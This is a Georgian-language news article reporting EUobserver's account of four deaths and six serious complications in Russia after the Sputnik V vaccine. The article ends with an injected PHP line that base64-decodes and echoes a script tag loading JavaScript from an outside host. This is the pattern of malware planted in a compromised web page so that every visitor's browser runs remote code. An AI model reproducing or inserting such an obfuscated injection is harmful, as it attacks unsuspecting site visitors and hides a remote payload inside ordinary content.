celsiusi
ავერსი შნაიდერი
რუსეთში „სპუტნიკ V” ვაქცინის შედეგად 4 ადამიანი გარდაიცვალა, 6 ადამიანს კი სერიოზული გართულებები განუვითარდა 
 
ბოლო დღეების განმავლობაში, რუსეთში "სპუტნიკი V" ვაქცინის შედეგად ოთხი ადამიანი გარდაიცვალა, ხოლო 6 ადამიანს სერიოზული გართულებები ჰქონდა. ამის შესახებ გამოცემა  EUobserver მომხმარებელთა უფლებების დაცვისა და კეთილდღეობის საკითხებზე ზედამხედველობის ფედერალური სამსახურის შიდა დოკუმენტებზე დაყრდნობით იუწყება. 
 
ევროპის წამლების სააგენტოში (ЕМА), რომელიც რუსულ ვაქცინას სწავლობს ევროკავშირში მისი შესაძლო რეგისტრაციისთვის, ჟურნალისტებს აცნობა, რომ მათვის ცნობილია ეს მასალები. როგორც  EUobserver აღნიშნავს, EMA რუსული ვაქცინის შედეგად გარდაცვალებისა და გართულებების შესახებ ანონიმურმა წყარომ მიაწოდა ინფორმაცია და არა მარეგულირებელ ორგანოებს შორის კომუნიკაციის ჩვეულებრივი არხებით.
 
EUobserver ინფორმაციის თანახმად, ოთხიდან სამი გარდაცვლილი -  51, 69 და 74 წლის ქალბატონები არიან. დოკუმენტებში აღნიშნულია, რომ სიკვდილიანობა გამოწვეული იყო გულის, ფილტვებისა და სისხლში შაქრის დონის პრობლემებით.  ერთ შემთხვევაში, დიაგნოზის სახით ერთ-ერთ შემთხვევაზე მითითებულია  ვაქცინაციის შემდგომი გართულება შედეგად გარდაცვალება. 
 
 
1531
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");